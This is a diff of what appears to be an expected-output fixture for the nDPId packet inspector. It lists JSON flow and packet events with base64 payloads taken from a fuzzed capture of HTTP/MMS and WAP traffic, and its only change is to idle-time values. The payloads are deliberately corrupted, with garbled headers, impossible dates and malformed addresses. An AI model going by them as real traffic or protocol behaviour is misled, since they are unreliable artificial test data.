-02416{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1031854488667,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":1031854488667,"pkt":"CAAgsl17AFCLk5N8CABFAAXc9kpAAIAGoJasFAMFrBQDDQopAFDkS6qKyacNVVAQIjheTQAAUE9TVCAvc2VydmxldHMvbW1zIEhUVFAvMS4xDQpIb3N8OiAxNzIuMjAuMy4xMw0KT3B0OiDQaHR0cDovL3d3dy53My5vcmdtMTk5OS8wNi8yNC1DQ1BQZXhjaGFuZ2UiOyBucz01Ng0KQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi92bmQud2FwLm1tcy1tZXNzYWdlDQpBY2NlcHQ6IGFwcGxpY2F0aW9uL3ZuZC53YXAubW1zLW1lc3NhZ2UNCkNhY2hlLUNvbnRyb2w6IG5vLWNhY2hlDQpBY2NlcHQtTGFuZ3VhZ2U6IGVuDQpVc2VyLUFnZW50OiBTb255RXJpY3Nzb25UNjgvUjIwMUENCkFjY2VwdC1DaGFyc2V0OiAqDQo1Ni1Qcm9maWxlLURpZmYtMTowPD94bWwgdmVyc2lvbj0iMS4wIj8+PHJkZjpSREYgeG1sbnM6cmRmPSJodHRwOi8vd3d3Lnd2Lm9yZy8xOTk5LzAyL6qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="} -00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1031854488666,"flow_last_seen":1031854488667,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1460,"flow_avg_l4_payload_len":486,"midstream":0,"thread_ts_msec":1031854488667,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":80,"dst_port":2601,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":10,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854488668,"flow_last_seen":1031854488668,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854488668,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":81,"dst_port":2601,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1031854488668,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1031854488668,"pkt":"AFCLk5N8CAAgsl17CABFAAAoxKhAAEAGF+2sFAMNrBQDBQBRCinJpw1V5EuwPlAQgyxYbQAA"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":11,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854488668,"flow_last_seen":1031854488668,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854488668,"l3_proto":"ip4","src_ip":"0.20.3.13","dst_ip":"172.20.3.5","src_port":80,"dst_port":2601,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1031854488668,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1031854488668,"pkt":"AFCLk5N8CAAgsl17CABFAAAoxKlAAEAGJXMAFAMNrBQDBQBQCinJpw1V5Eu18lAQgyxSuQAA"} +00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854488666,"flow_last_seen":1031854488666,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1031854488666,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":80,"dst_port":2601,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1031854488666,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1031854488666,"pkt":"AFCLk5N8CAAgsl17CABFAAAsxKdAAEAGF+qsFAMNrBQDBQBQCinJpw1U5EuqimASgyxGZAAAAgQFtA=="} +00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1031854488666,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1031854488666,"pkt":"CAAgsl17AFCLk5N8CABFAAAo9UpAAIAGp0qsFAMFrBQDDQopAFDkS6qKyacNVVAQIji\/FQAAAgQFtGDD"} +02416{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1031854488667,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":1031854488667,"pkt":"CAAgsl17AFCLk5N8CABFAAXc9kpAAIAGoJasFAMFrBQDDQopAFDkS6qKyacNVVAQIjheTQAAUE9TVCAvc2VydmxldHMvbW1zIEhUVFAvMS4xDQpIb3N8OiAxNzIuMjAuMy4xMw0KT3B0OiDQaHR0cDovL3d3dy53My5vcmdtMTk5OS8wNi8yNC1DQ1BQZXhjaGFuZ2UiOyBucz01Ng0KQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi92bmQud2FwLm1tcy1tZXNzYWdlDQpBY2NlcHQ6IGFwcGxpY2F0aW9uL3ZuZC53YXAubW1zLW1lc3NhZ2UNCkNhY2hlLUNvbnRyb2w6IG5vLWNhY2hlDQpBY2NlcHQtTGFuZ3VhZ2U6IGVuDQpVc2VyLUFnZW50OiBTb255RXJpY3Nzb25UNjgvUjIwMUENCkFjY2VwdC1DaGFyc2V0OiAqDQo1Ni1Qcm9maWxlLURpZmYtMTowPD94bWwgdmVyc2lvbj0iMS4wIj8+PHJkZjpSREYgeG1sbnM6cmRmPSJodHRwOi8vd3d3Lnd2Lm9yZy8xOTk5LzAyL6qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="} +00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1031854488666,"flow_last_seen":1031854488667,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1460,"flow_avg_l4_payload_len":486,"midstream":0,"thread_ts_msec":1031854488667,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":80,"dst_port":2601,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":10,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854488668,"flow_last_seen":1031854488668,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854488668,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":81,"dst_port":2601,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1031854488668,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1031854488668,"pkt":"AFCLk5N8CAAgsl17CABFAAAoxKhAAEAGF+2sFAMNrBQDBQBRCinJpw1V5EuwPlAQgyxYbQAA"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":11,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854488668,"flow_last_seen":1031854488668,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854488668,"l3_proto":"ip4","src_ip":"0.20.3.13","dst_ip":"172.20.3.5","src_port":80,"dst_port":2601,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1031854488668,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1031854488668,"pkt":"AFCLk5N8CAAgsl17CABFAAAoxKlAAEAGJXMAFAMNrBQDBQBQCinJpw1V5Eu18lAQgyxSuQAA"} 00199{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":15,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","layer_type":21760,"global_ts_msec":1031854488923} 00611{"packet_event_id":1,"packet_event_name":"packet","packet_id":15,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":243,"pkt_type":21760,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":243,"pkt_l4_len":0,"thread_ts_msec":1031854488771,"pkt":"AFCLk5N8CAAgsl17VQBFAADlxKtAAEAGFy2sFAMNrBQDBQBQCinLpw1V5EvBTVAYgyzwBgAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXL+IFJlc2luLzIuMMsxDQpDb2509m50LVR5cGU6IGFwcGxpY2F0aW9uL3ZuZC53YXAubW1zLW1lc3NhZ2UNCkNvbnRlbnQtTGVuZ3RoOiA0NQ0KRGF0ZTogVGh1LCAxMiBTZXAgMjAwMiAxODoxNDo0OCBHTVQNCg0KjIGYMS05YmEwAI2QkoCLMTg5MzAwQGdl\/WTHMi5tb2JpbGl0eWxhYi5uZXQA"} -00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":16,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854489004,"flow_last_seen":1031854489004,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1031854489004,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":53132,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1031854489004,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1031854489004,"pkt":"AFCLk5N8CAAgsl17CABFAAAwxKxAAEAGF+GsFAMNrBQDBc+MAFDJtOyOAAAAAHACgywbmAAAAQEEiQIEBbQ="} -00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1031854489005,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1031854489005,"pkt":"CAAgsl17AFCLk5N8CABFAAAs+0pAAIAGoUasFAMFrBQDDQBQz4zkTZoOyWDsj2ASIjgTJgAAAgQFtG4v"} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1031854489005,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1031854489005,"pkt":"AFCLk5N8CAAgsl17CABFAAAoxK1AAEAGF+isFAMNrBQDBc+MAFDJtOyP\/k2aD1AQgyzJ7gAA"} -00752{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1031854489004,"flow_last_seen":1031854489006,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":316,"flow_tot_l4_payload_len":316,"flow_avg_l4_payload_len":79,"midstream":0,"thread_ts_msec":1031854489006,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":53132,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"%s","url":"%s","code":0,"content_type":"","user_agent":"MMS-Relay-DeliveryInitiator"}} -00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":22,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854489007,"flow_last_seen":1031854489007,"flow_idle_time":7440000,"flow_min_l4_payload_len":89,"flow_max_l4_payload_len":89,"flow_tot_l4_payload_len":89,"flow_avg_l4_payload_len":89,"midstream":1,"thread_ts_msec":1031854489007,"l3_proto":"ip4","src_ip":"172.20.3.1","dst_ip":"172.20.3.13","src_port":80,"dst_port":53132,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1031854489007,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":143,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":143,"pkt_l4_len":109,"thread_ts_msec":1031854489007,"pkt":"CAAgsl17AFCLk5N8CABFAACB\/UpAAIAGnvGsFAMBrBQDDQBQz4zkTZoPybTxE1AYHbQX8gAASFRUUC8xLjEgMTAwIENvbnRpbnVlDQpTZXJ2ZXI6IE1pY3Jvc29mdC1JSVMvNC4wDQpQYXRlOiBUaHUsIDEyIFNlcCAyMDAyIDE3OjU4OjU2IEdNVA0KDQo="} -00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":24,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854489031,"flow_last_seen":1031854489031,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1031854489031,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.57.3.13","src_port":80,"dst_port":53132,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00655{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1031854489031,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":195,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":195,"pkt_l4_len":161,"thread_ts_msec":1031854489031,"pkt":"CAAgsl17AFCLk5N8CABFAAC1\/kpAAIAGnb2sFAMFrDkDDQBQz4zkTZpoybTxE1AYHbQrwQAASFRUby8xLjEgMjAyIEFjY2VwdGVkDQpTZXJ2ZXI6IE1pY3Jvc29mdC1JSVMvNC4wDQpEYXRlOiBUaHUsIDEyIFNlcCAyMDUyIDE3OjU4OjU2IEdNVA0KQ29udGVudC1MZW5ndGg6IDQyNw0KJXMAdGVudC1UeXBlOiBhcHBsaWNhdGlvbi94bWwNCg0K"} -00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":26,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854489131,"flow_last_seen":1031854489131,"flow_idle_time":7440000,"flow_min_l4_payload_len":427,"flow_max_l4_payload_len":427,"flow_tot_l4_payload_len":427,"flow_avg_l4_payload_len":427,"midstream":1,"thread_ts_msec":1031854489131,"l3_proto":"ip4","src_ip":"172.6.3.5","dst_ip":"172.20.3.13","src_port":80,"dst_port":53132,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -01039{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1031854489131,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":481,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":481,"pkt_l4_len":447,"thread_ts_msec":1031854489131,"pkt":"CAAgsl17AFCLk5N8CABFAAHT\/0pAAIAGm5+sBgMFrBQDDQBQz4zkTZr1ybTxE1AYHbTqTgAAPD94bWwgdmVyc2lvbj0iMS4wIj8+CjwhRE9DVFlQRSBwYXAgUFVCTElDICItLy9XQVBGT1JVTS8vRFREIFBBUCAxLjAvL0VOIgogICAgICAgICAgImh0dHA6Ly93d3cud2FwZm9ydW0ub3JnL0RURC9wYXBfMS4wLmR0ZCI+CjxwYXA+CiAgPHB1c2gtcmVzcG9uc2UgcnVzaC1pZD0iMTg5MzAxXzEwMzE4NTQ0ODg5OTdfMTAzOEBnZWNkczIubW9iaWxpdHlsYWIubmV0IiBzZW5kZXKtYWRkcmVzcz0iaHR0cDovL2xtY21vbGYud2FwbWF0aWMuZGUiIHNlbmRlcuRuYW1lPSJ3Z3A0IiByZXBseS2qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqg=="} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":33,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854495447,"flow_last_seen":1031854495447,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1031854495447,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.21.3.13","src_port":2602,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":33,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1031854495447,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1031854495447,"pkt":"CAAgsl17AFCLk5N8CABFAAAsB0tAAIAGlUasFAMFrBUDDQoqAFDkZMdqAADsAGACIABjogAAAgQFtFQI"} +00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":16,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854489004,"flow_last_seen":1031854489004,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1031854489004,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":53132,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1031854489004,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1031854489004,"pkt":"AFCLk5N8CAAgsl17CABFAAAwxKxAAEAGF+GsFAMNrBQDBc+MAFDJtOyOAAAAAHACgywbmAAAAQEEiQIEBbQ="} 